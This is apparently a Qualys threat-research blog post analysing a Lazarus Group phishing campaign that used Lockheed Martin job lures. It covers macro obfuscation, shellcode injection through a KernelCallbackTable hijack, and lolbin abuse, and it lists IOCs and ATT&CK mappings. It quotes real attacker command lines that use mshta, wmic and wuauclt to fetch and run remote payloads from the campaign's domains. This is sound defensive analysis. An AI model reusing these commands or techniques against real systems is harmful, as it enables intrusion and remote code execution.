5.756.2 10.023 4.168 12.4 7.344 0 0 10.76-9.2 12.062-10.183a30.164 30.164 0 0 0-25.661-14.657 27.317 27.317 0 0 0-28.054 26.48c-.285 12.937 7.292 18.276 17.23 23.913l16.357 9.2c3.774 2.639 5.554 4.609 5.464 8.669-.14 6.362-5.461 10.486-12.352 10.893-5.069.3-9.232-2.631-13.176-6.759-7.677-8.034-19.46-4.172-23.065-3.01 7.5 17.24 21.68 27.279 35.849 27.591 17.844.393 32.118-12.777 32.5-29.983.174-8.286-3.456-18.578-22.646-27.813z" fill="#262626"/><path d="M62.924 126.929c0-34.142 26.991-61.918 60.167-61.918a60.285 60.285 0 0 1 60.217 60.217c0 26.507-22.786 48.316-40.348 59.523 6.813 3.887 21.849 7.969 36.245 9.289a86.906 86.906 0 0 0 33.843-68.811 89.957 89.957 0 1 0-179.913 0c0 29.958 12.474 56.571 36.072 76.964 22.063 19.065 54.336 31.791 91.081 37.816 7.96-4.4 21.576-17.387 26.681-24.99-30.688-3.947-59.732-11.431-79.2-21.645-29.757-15.609-44.845-37.964-44.845-66.445z" fill="#fff"/></svg> </span> <span class="q-logo-text">Community</span> </a> <div class="q-user-menu"> <div class="q-user-menu__icon hidden"> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="19" height="23"> <g fill="currentColor"> <g transform="translate(3 -.093)"> <path d="M6.284.092a5.709 5.709 0 1 1-.002 11.418A5.709 5.709 0 0 1 6.284.092"></path> </g> <g transform="translate(0 11.907)"> <path d="M.187 7.575C-.476 9.195.703 11 2.47 11h13.922c1.767 0 2.946-1.804 2.283-3.425C16.945 3.45 13.445.65 9.431.65c-4.015 0-7.55 2.8-9.244 6.925"></path> </g> </g> </svg> </div> </div> </div> </header> </div> <div class="q-search__container"> <div class="q-search"> <div id="searchbox"> <div class="q-coveo__wrapper"> <div class="q-coveo-searchbutton"> <div class="CoveoSearchButton"></div> </div> <div class="q-coveo-querybox"> <div class="CoveoOmnibox" data-enable-query-suggest-addon="true"></div> </div> </div> </div> </div> </div> <div id="page" class="q-main_content"> <div class='q-home-header__sidebar q-blog__home-link'> <div class='q-blog__home-link-wrapper'> <div class="q-menu__home-container"><ul id="menu-blog-home" class="menu"><a href='/'> <img class='link-arrow' src='https://d1uyme8f6ss6qi.cloudfront.net/image/icon/link-arrow-left.svg' width='7' height='10'> <span>Blog Home</span> </a></li> </ul></div> </div> </div> <div class="q-main_content-container"> <main id="primary" class="site-main q-single__post-content"> <article id="post-29363" class="post-29363 post type-post status-publish format-standard hentry category-vulnerabilities-threat-research"> <header class="entry-header"> <h1 class="q-blog__post-title">LolZarus: Lazarus Group Incorporating Lolbins into Campaigns</h1> <div class="q-post__entry-header-outerwrapper"> <div class="q-post__entry-header-wrapper"> <div class="q-post__entry-header"> <div class="q-post__entry-avatar"> <img src='https://secure.gravatar.com/avatar/a5da0efab1b59e29fb9828966a05e5a0?s=110&d=mm&r=g' width='54' alt='Akshat Pradhan' /> </div> <div class="entry-meta q-post__entry-meta"> <div class="q-post__entry-author"> <span class="byline"> <span class="author vcard"><a class="url fn n" href="https://blog.qualys.com/author/apradhan">Akshat Pradhan</a></span>, Senior Engineer, Threat Research, Qualys</span> </div> <div class="q-post__entry-time"> <span class="posted-on"><a href="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns" rel="bookmark"><time class="entry-date published" datetime="2022-02-08T03:24:37-08:00">February 8, 2022</time><time class="updated" datetime="2022-12-23T00:09:48-08:00">December 23, 2022</time></a></span> - 5 min read </div> </div> </div> <div class="q-post__entry-vote"> <div class='likebutton likebutton_json' data-postid='29363' data-style='style1'></div> </div> </div> </div> <p class='q-last-modified-date'><strong>Last updated on:</strong> <em>December 23, 2022</em></p> </header> <div class="entry-content q-single__post-wrapper q-has-toc"> <div class="q-single__post--toc"><div class="toc"><h4>Table of Contents</h4><ul><li><a href='#sample-analysis'>Sample Analysis</a></li><li><a href='#conclusion'>Conclusion</a></li><li><a href='#attck-mapping'>ATT&CK Mapping</a></li><li><a href='#iocs'>IOCS</a></li><li><a href='#domains'>Domains</a></li></ul></div></div> <div class="q-single__post--content"> <p><em>Qualys Threat Research has identified a new Lazarus campaign using employment phishing lures targeting the defence sector. The identified variants target job applicants for Lockheed Martin. This blog details the markers of this campaign, including macro content, campaign flow and phishing themes of our identified variants and older variants that have been attributed to Lazarus by other vendors.</em></p> <p>The Qualys Research Team recently identified a new Lazarus campaign using employment phishing lures targeting the defence sector. The identified variants target job applicants for Lockheed Martin Corporation, which is an American aerospace, arms, defence, information security, and technology corporation. This is thematically similar to other observed variants where Lazarus has posed as defence companies like <a href="https://www.northropgrumman.com/">Northrop Grumman</a> and <a href="https://www.baesystems.com/en/home">BAE Systems</a> with job openings. We refer to this campaign as “LolZarus” due to the use of different lolbins in observed samples, some of which are the lolbin’s first recorded usage by a well-known adversary.</p> <h2 id="sample-analysis" class="wp-block-heading">Sample Analysis</h2> <p>We identified two phishing documents: “Lockheed_Martin_JobOpportunities.docx” and “Salary_Lockheed_Martin_job_opportunities_confidential.doc”. Both variants were authored by the same user, named “Mickey”. The methodology used for control flow hijack and the macro content is similar across both samples.</p> <p><strong>MD5:</strong> a27a9324d282d920e495832933d486ee</p> <p><strong>Name:</strong> Salary_Lockheed_Martin_job_opportunities_confidential.doc</p> <span id="more-29363"></span> <figure class="wp-block-image size-full"><a data-fancybox href="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1.png"><img loading="lazy" decoding="async" width="1237" height="887" data-attachment-id="29364" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig1-8" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1.png" data-orig-size="1237,887" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig1" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1-300x215.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1-1070x767.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1.png" alt="" class="wp-image-29364" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1.png 1237w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1-300x215.png 300w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1-1070x767.png 1070w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1-768x551.png 768w" sizes="(max-width: 1237px) 100vw, 1237px" /></a><figcaption class="wp-element-caption">Fig1. LockHeed Recruitment Lure</figcaption></figure> <p>The macro uses aliases to rename the APIs that it uses (fig. 2).</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="602" height="242" data-attachment-id="29365" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig2-8" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig2.png" data-orig-size="602,242" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig2" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig2-300x121.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig2.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig2.png" alt="" class="wp-image-29365" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig2.png 602w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig2-300x121.png 300w" sizes="(max-width: 602px) 100vw, 602px" /><figcaption class="wp-element-caption">Fig2. Renamed API aliases.</figcaption></figure></div> <p>The initial entry point for the macro is via the ActiveX Frame1_Layout to automatically execute once ActiveX control is enabled (fig. 3).</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="452" height="69" data-attachment-id="29367" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig3-7" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig3.png" data-orig-size="452,69" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig3" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig3-300x46.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig3.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig3.png" alt="" class="wp-image-29367" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig3.png 452w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig3-300x46.png 300w" sizes="(max-width: 452px) 100vw, 452px" /><figcaption class="wp-element-caption">Fig3. EntryPoint of obfuscated Macro.</figcaption></figure></div> <p>The macro starts by loading WMVCORE.DLL, which is a legitimate windows dll for windows media. Interestingly, to make the macro seem more innocuous, Lazarus uses function names identical to the exported functions of WMVCORE.DLL and variable names thematically related to playback (fig. 4).</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="602" height="294" data-attachment-id="29368" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig4-4" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig4.png" data-orig-size="602,294" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig4" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig4-300x147.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig4.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig4.png" alt="" class="wp-image-29368" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig4.png 602w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig4-300x147.png 300w" sizes="(max-width: 602px) 100vw, 602px" /><figcaption class="wp-element-caption">Fig.4 WMV playback variables and wmvcore.dll function names</figcaption></figure></div> <p>The macro uses a check for a document variable before entering its main functionality block. This variable is set at the end to ensure that subsequent opening of the document does not execute it again.</p> <p>The second stage payload is shellcode that is embedded as a base64 encoded string array inside the macro that is decoded by using CryptStringToBinaryW (fig. 5). Other variants have used the UuidFromStringA function to decode the embedded payload and write it to an executable Heap.</p> <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1046" height="330" data-attachment-id="29369" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig5a" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5a.png" data-orig-size="1046,330" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig5a" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5a-300x95.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5a.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5a.png" alt="" class="wp-image-29369" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5a.png 1046w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5a-300x95.png 300w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5a-768x242.png 768w" sizes="(max-width: 1046px) 100vw, 1046px" /></figure> <div class="wp-block-columns is-layout-flex wp-container-core-columns-is-layout-3 wp-block-columns-is-layout-flex"> <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow"> <figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" data-attachment-id="29370" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig5b" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5b.png" data-orig-size="263,39" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig5b" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5b.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5b.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5b.png" alt="" class="wp-image-29370" width="371" height="55"/></figure> </div> <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow"> <figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" data-attachment-id="29371" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig5c" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5c.png" data-orig-size="338,39" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig5c" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5c-300x35.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5c.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5c.png" alt="" class="wp-image-29371" width="396" height="46" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5c.png 338w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5c-300x35.png 300w" sizes="(max-width: 396px) 100vw, 396px" /></figure> </div> </div> <p class="has-text-align-center has-small-font-size">Fig.5 Payload decoded via CryptStringToBinaryW.</p> <p>The decoded shellcode then overwrites the <em>WMIsAvailableOffline</em> function from WMVCORE.dll by retrieving its address and changing its memory permissions.</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="736" height="306" data-attachment-id="29373" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig6a" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6a.png" data-orig-size="736,306" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig6a" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6a-300x125.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6a.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6a.png" alt="" class="wp-image-29373" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6a.png 736w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6a-300x125.png 300w" sizes="(max-width: 736px) 100vw, 736px" /></figure></div> <p></p> <div class="wp-block-columns is-layout-flex wp-container-core-columns-is-layout-4 wp-block-columns-is-layout-flex"> <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow"> <figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" data-attachment-id="29374" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig6b" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6b.png" data-orig-size="297,62" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig6b" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6b.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6b.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6b.png" alt="" class="wp-image-29374" width="302" height="63"/></figure> </div> <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow"> <figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" data-attachment-id="29375" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig6c" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6c.png" data-orig-size="178,133" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig6c" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6c.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6c.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6c.png" alt="" class="wp-image-29375" width="171" height="128"/></figure> </div> </div> <p class="has-text-align-center has-small-font-size">Fig.6 VirtualProtect and memcpy’s.</p> <p>The callback to the shellcode is achieved by retrieving the KernelCallbackTable pointer from the PEB structure of the current process via NtQueryInformationProcess, and then patching the <em>_fnDWORD</em> pointer to point to <em>WMIsAvailableOffline</em>. Whenever winword makes any graphical call, the shellcode executes. This technique to hijack control flow has also been used by other sophisticated attackers such as <a href="https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/">FinFisher</a>. Lazarus has also used other novel methods to execute shellcode such as by using the function <em>EnumSystemLocalesA</em> as a callback to shellcode written to executable heap.</p> <p>The macro then sets a document variable to ensure that subsequent runs would not execute the shellcode decode and the KernelCllbackTable hijack again. It also retrieves a decoy document from <em>https://markettrendingcenter[.]com/lk_job_oppor[.]docx</em> and displays it (fig. 7.)</p> <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="904" height="110" data-attachment-id="29380" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/pic-7a" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/pic-7a.png" data-orig-size="904,110" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="pic-7a" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/pic-7a-300x37.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/pic-7a.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/pic-7a.png" alt="" class="wp-image-29380" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/pic-7a.png 904w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/pic-7a-300x37.png 300w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/pic-7a-768x93.png 768w" sizes="(max-width: 904px) 100vw, 904px" /></figure> <figure class="wp-block-image size-full"><a data-fancybox href="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7.png"><img loading="lazy" decoding="async" width="1237" height="892" data-attachment-id="29378" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig7-4" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7.png" data-orig-size="1237,892" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig7" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7-300x216.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7-1070x772.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7.png" alt="" class="wp-image-29378" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7.png 1237w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7-300x216.png 300w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7-1070x772.png 1070w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7-768x554.png 768w" sizes="(max-width: 1237px) 100vw, 1237px" /></a><figcaption class="wp-element-caption">Fig.7 Decoy Document.</figcaption></figure> <p>The shellcode mainly sets up a periodic beacon out to <em>https://markettrendingcenter[.]com/member[.]htm</em> by creating a new staging folder <code>C:\WMAuthorization</code>, writing a vbs file (WMVxEncd.vbs) to it, and creating a corresponding Scheduled task to run the vbs file every 20 minutes (fig. 8). shellObj is the Wscript.Shell object that the vbs file uses to execute the beacon command.</p> <pre class="wp-block-preformatted">shellObj.Run "forfiles /p c:\windows /m HelpPane.exe /c ""mshta C:\WMAuthorization\WMPlaybackSrv ""https://markettrendingcenter.com/member.htm""""", 0, True</pre> <div class="wp-block-image"> <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="708" height="824" data-attachment-id="29379" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig8-3" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig8.png" data-orig-size="708,824" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig8" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig8-300x349.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig8.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig8.png" alt="" class="wp-image-29379" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig8.png 708w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig8-300x349.png 300w" sizes="(max-width: 708px) 100vw, 708px" /><figcaption class="wp-element-caption">Fig.8 Schedule Task Dump</figcaption></figure></div> <p>Here, WMPlaybackSrv is a renamed wscript.exe and <em>WindowsMediaPlayerVxEncdSrv</em> is a renamed mshta.exe. Another variant of the campaign uses the lolbin <em>wuauclt</em>.</p> <pre class="wp-block-preformatted">cmd /C ''C:\Windows\system32\wuauclt.exe' /UpdateDeploymentProvider wuaueng.dll /RunHandlerComServer</pre> <p>Earlier variants have used a copy of wmic.</p> <pre class="wp-block-preformatted">%COMSPEC% /c Start /miN c:\Intel\hidasvc ENVIRONMENT get STATUS /FORMAT:”hxxps://www.advantims[.]com/GfxCPL.xsl”</pre> <p>Additional vendors have also identified a variant that uses <a href="https://twitter.com/_CPResearch_/status/1352310521752662018">pcalua.exe</a>.<br>Unfortunately, we were unable to get further details about the remote htm payload as it returns a 404 error.</p> <h2 id="conclusion" class="wp-block-heading">Conclusion</h2> <p>We attribute this campaign to Lazarus as there is significant overlap in the macro content, campaign flow, and phishing themes of our identified variants as well as older variants that have been attributed to Lazarus by other <a href="https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/">vendors</a>. Additional vendors have reported on the current campaign while attributing it to <a href="https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/">Lazarus</a>.</p> <p>Lazarus continues to evolve its capabilities by utilizing lesser-known shellcode execution techniques and incorporating various lolbins as part of its campaign. Qualys will continue to monitor for other similar phishing lures related to Lazarus.</p> <p>Existing customers of Qualys can use the following QQL’s to identify this activity:</p> <pre class="wp-block-code"><code><pre class="wp-block-code"><div class="q-code">mitre.attack.technique.id:”Q0026” is mitre.attack.technique.id:”T1218.005” mitre.attack.technique.id:”T1202” mitre.attack.technique.id:”T1036.003” mitre.attack.technique.id:”T1059.005”</div></pre></code></pre> <h2 id="attck-mapping" class="wp-block-heading">ATT&CK Mapping</h2> <p><a href="https://attack.mitre.org/techniques/T1566/001/">Phishing: Spearphishing Attachment T1566.001</a></p> <p><a href="https://attack.mitre.org/techniques/T1047/">Windows Management Instrumentation (T1047)</a></p> <p><a href="https://attack.mitre.org/techniques/T1036/003/">Masquerading: Rename System Utilities (T1036.003)</a></p> <p><a href="https://attack.mitre.org/techniques/T1218/005/">Signed Binary Proxy Execution: Mshta (T1218.005)</a></p> <p><a href="https://attack.mitre.org/techniques/T1059/005/">Command and Scripting Interpreter: Visual Basic (T1059.005)</a></p> <p><a href="https://attack.mitre.org/techniques/T1053/005/">Scheduled Task/Job: Scheduled Task (T1053.005)</a></p> <p><a href="https://attack.mitre.org/techniques/T1106/">Native API (T1106)</a></p> <p><a href="https://attack.mitre.org/techniques/T1574/">Hijack Execution Flow (T1574)</a></p> <p><a href="https://attack.mitre.org/techniques/T1059/003/">Command and Scripting Interpreter: Windows Command Shell (T1059.003)</a></p> <h2 id="iocs" class="wp-block-heading">IOCS</h2> <h3 class="wp-block-heading">Hashes</h3> <pre class="wp-block-code"><div class="q-code"><code>e87b575b2ddfb9d4d692e3b8627e3921<br>a27a9324d282d920e495832933d486ee<br>3f326da2affb0f7f2a4c5c95ffc660cc<br>490c885dc7ba0f32c07ddfe02a04bbb9<br>712a8e4d3ce36d72ff74b785aaf18cb0<br>a27a9324d282d920e495832933d486ee<br>f2a0e9034d67f8200993c4fa8e4f5d15</div></pre> <h2 id="domains" class="wp-block-heading">Domains</h2> <p>markettrendingcenter.com</p> <p>lm-career.com</p> <p>advantims.com</p> <div id='jp-relatedposts' class='jp-relatedposts' > <h3 class="jp-relatedposts-headline"><em>Related</em></h3> </div> </div> </div> <footer class="entry-footer"> <div class='q-single-post__footer-content'> <div class='q-single-post__footer-author'> <div class='q-post__entry-avatar'> <img src='https://secure.gravatar.com/avatar/a5da0efab1b59e29fb9828966a05e5a0?s=180&d=mm&r=g' width='90' alt='Akshat Pradhan' /> </div> <div class='q-post__entry-author'> <div class='q-post__entry-writtenby'>Written by</div> <span class="byline"> <span class="author vcard"><a class="url fn n" href="https://blog.qualys.com/author/apradhan">Akshat Pradhan</a></span>, Senior Engineer, Threat Research, Qualys</span> <div class='q-post__entry-author-email'>Write to Akshat at <a href='mailto:apradhan@qualys.com'>apradhan@qualys.com</a></div> </div> </div> <div class='q-single-post__footer-actions'> <div class='q-single-post__action'><label>Like</label><div class='likebutton likebutton_json' data-postid='29363' data-style='style2'></div></div> <div class="q-single-post__action"><label>Share</label><div class="ShariffSC" style="border-top: 1px solid #ddd; border-top: 1px solid rgba(0,0,0,.2); padding-top: 2em;"><div class="shariff shariff-align-flex-start shariff-widget-align-flex-start" style="display:none"><ul class="shariff-buttons theme-round orientation-horizontal buttonsize-medium"><li class="shariff-button linkedin" style="background-color:#97A0AF"><a href="https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Fblog.qualys.com%2Fvulnerabilities-threat-research%2F2022%2F02%2F08%2Flolzarus-lazarus-group-incorporating-lolbins-into-campaigns" title="Share on LinkedIn" aria-label="Share on LinkedIn" role="button" rel="noopener nofollow" class="shariff-link" style="; background-color:#6A778B; color:#fff" target="_blank"><span class="shariff-icon" style=""><svg width="32px" height="20px" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 27 32"><path fill="#0077b5" d="M6.2 11.2v17.7h-5.9v-17.7h5.9zM6.6 5.7q0 1.3-0.9 2.2t-2.4 0.9h0q-1.5 0-2.4-0.9t-0.9-2.2 0.9-2.2 2.4-0.9 2.4 0.9 0.9 2.2zM27.4 18.7v10.1h-5.9v-9.5q0-1.9-0.7-2.9t-2.3-1.1q-1.1 0-1.9 0.6t-1.2 1.5q-0.2 0.5-0.2 1.4v9.9h-5.9q0-7.1 0-11.6t0-5.3l0-0.9h5.9v2.6h0q0.4-0.6 0.7-1t1-0.9 1.6-0.8 2-0.3q3 0 4.9 2t1.9 6z"/></svg></span></a></li><li class="shariff-button facebook" style="background-color:#97A0AF"><a 